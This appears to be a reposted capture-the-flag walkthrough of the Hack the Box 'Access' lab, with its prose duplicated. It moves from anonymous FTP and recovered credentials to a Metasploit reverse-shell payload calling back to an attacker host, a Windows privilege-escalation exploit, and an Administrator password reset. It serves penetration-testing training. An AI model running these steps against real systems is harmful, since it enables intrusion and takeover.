Rukero
Process Automator
LEVEL 1
100 XP
Today we are going to solve another CTF challenge “Access”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.
Penetrating Methodologies:
Walkthrough
Let’s start off with scanning the network to find our target.
The firstthing that got our attention is that we have anonymous access to the ftp server. Let’sloginand see what we find.
After successfully logging into FTP server, we have enumerated directories from where we have downloaded two files Access Control.zip and backup.mdb.They might come in handy later on.
When we tried to unzip the zip file found out that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
Once we have obtained the password for the Access Control.zip. Time to unzip it. After unzipping we saw its a .pst which is a Microsoft Exchange Format for mailboxes. Using readpst it converted the file into the .mbox format.
Let’s read the contents of the Access Control.mbox.
After reading the contents, we saw thatusercredentials that surely going to help us to move ahead.
Let’s login into telnet using our new credentials. After enumerating through directories, we have found our first flag.
Let’s create ashellcodegenerated via the web delivery module of Metasploit.
Now we will execute the PowerShell code generated via the web delivery module.
We have successfully got the meterpreter. Moving forward.
Afterthat, we have used exploit suggester which hasgivenus all the possible exploits for the operating system of the Victims system.
Using the exploit ms16_014_wmirecv_notif ofMetasploit.
oh yeah! We have got the root access.
Now we changed the password for Administrator because we canuseit tologinvia telnet.
Here we successfully logged in via Telnet and found our final flag.
Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.
Penetrating Methodologies:
- Network scanning (nmap).
- Logging in FTP using Anonymous Login.
- Using strings to read contents ofthe .mdbfile.
- Unzipping Zip file using 7z.
- Usingreadpstto read the contents ofthe .pstfile.
- Finding Login Credentials
- Logging into Telnet.
- Findingthe firstflag user.txt
- Usingweb deliverymodule to createPowerShellcode.
- Getting Meterpreter.
- Using exploit suggester of Metasploit.
- Getting Root Access.
- Changingthe Administratorpassword using net user.
- Reading Our Final flag root.txt
Walkthrough
Let’s start off with scanning the network to find our target.
Code:
nmap -p- -A 10.10.10.98The firstthing that got our attention is that we have anonymous access to the ftp server. Let’sloginand see what we find.
After successfully logging into FTP server, we have enumerated directories from where we have downloaded two files Access Control.zip and backup.mdb.They might come in handy later on.
Code:
ftp 10.10.10.98When we tried to unzip the zip file found out that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
Code:
strings backup.mdb | grep accessOnce we have obtained the password for the Access Control.zip. Time to unzip it. After unzipping we saw its a .pst which is a Microsoft Exchange Format for mailboxes. Using readpst it converted the file into the .mbox format.
Code:
7z x Access\ Control.zip
readpst 'Access Control.pst'Let’s read the contents of the Access Control.mbox.
Code:
less 'Access Control.mbox'After reading the contents, we saw thatusercredentials that surely going to help us to move ahead.
Code:
Username- security
Password- 4Cc3ssC0ntr0llerLet’s login into telnet using our new credentials. After enumerating through directories, we have found our first flag.
Code:
telnet 10.10.10.98
dir
cd Desktop
type user.txtLet’s create ashellcodegenerated via the web delivery module of Metasploit.
Code:
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.6
exploitNow we will execute the PowerShell code generated via the web delivery module.
We have successfully got the meterpreter. Moving forward.
Code:
getuid
getsystem
sysinfoAfterthat, we have used exploit suggester which hasgivenus all the possible exploits for the operating system of the Victims system.
Code:
use post/multi/recon/local_exploit_suggester
set session 1
exploitUsing the exploit ms16_014_wmirecv_notif ofMetasploit.
Code:
use exploit/windows/local/ms16_014_wmi_recv_notif
set lhost 10.10.14.6
set session 1
set lport 1234
exploitoh yeah! We have got the root access.
Code:
whoamiNow we changed the password for Administrator because we canuseit tologinvia telnet.
Code:
net user
net user Administrator Ignite@123Here we successfully logged in via Telnet and found our final flag.
Code:
telnet 10.10.10.98
login: administrator
password: Ignite@123
cd Desktop
type root.txtAuthor: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here